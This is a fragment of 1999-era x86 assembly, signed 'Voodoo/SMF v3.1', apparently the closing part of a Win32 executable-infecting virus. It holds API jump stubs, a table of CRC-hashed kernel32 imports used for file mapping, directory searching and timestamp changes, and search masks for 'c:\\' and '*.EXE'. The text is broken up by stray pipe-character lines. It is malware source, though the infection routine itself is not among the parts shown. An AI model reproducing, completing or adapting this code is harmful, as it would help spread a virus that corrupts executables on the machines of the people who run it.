jmp dword ptr ds:[ebx+_FindNextFileA]
|
|||
|
GetCurrentDirectory:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_GetCurrentDirectory]
|
|||
|
SetCurrentDirectory:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_SetCurrentDirectory]
|
|||
|
SetFileAttributesA:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_SetFileAttributesA]
|
|||
|
SetFileTime:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_SetFileTime]
|
|||
|
GetSystemTime:
|
|||
|
call LoadMemPointer
|
|||
|
jmp dword ptr ds:[ebx+_GetSystemTime]
|
|||
|
db '(c) Voodoo/SMF v3.1 07.08.1999'
|
|||
|
;-------------------
|
|||
|
GetProcAddress dd 11223344h
|
|||
|
KernelHandle dd 11223344h
|
|||
|
Name_Pointers_RVA dd 11223344h
|
|||
|
_GlobalAlloc dd 11223344h
|
|||
|
_GlobalLock dd 11223344h
|
|||
|
MemPointer dd 11223344h
|
|||
|
disk db 'c:\',0
|
|||
|
Dirmask DB '*.*',0
|
|||
|
mask DB '*.EXE',0
|
|||
|
ImportCount EQU (offset EndImportTable- offset ImportTable)/4
|
|||
|
ImportTable: dd GlobalUnlockCRC
|
|||
|
dd GlobalFreeCRC
|
|||
|
dd CreateFileACRC
|
|||
|
dd CreateFileMappingACRC
|
|||
|
dd MapViewOfFileCRC
|
|||
|
dd UnmapViewOfFileCRC
|
|||
|
dd FlushViewOfFileCRC
|
|||
|
dd CloseHandleCRC
|
|||
|
dd FindFirstFileACRC
|
|||
|
dd FindNextFileACRC
|
|||
|
dd SetFileAttributesACRC
|
|||
|
dd SetFileTimeCRC
|
|||
|
dd GetFileSizeCRC
|
|||
|
dd GetCommandLineACRC
|
|||
|
dd ReadFileCRC
|
|||
|
dd lstrcpyACRC
|
|||
|
dd SetFilePointerCRC
|
|||
|
dd GetCurrentDirectoryCRC
|
|||
|
dd SetCurrentDirectoryCRC
|
|||
|
dd GetSystemTimeCRC
|
|||
|
dw 6666h
|
|||
|
EndImportTable:
|
|||
|
Voodoo_Ver_3_0E:
|
|||
|
Ends
|
|||
|
End Voodoo_Ver_3_1
|
|||
|
===== Cut =====
|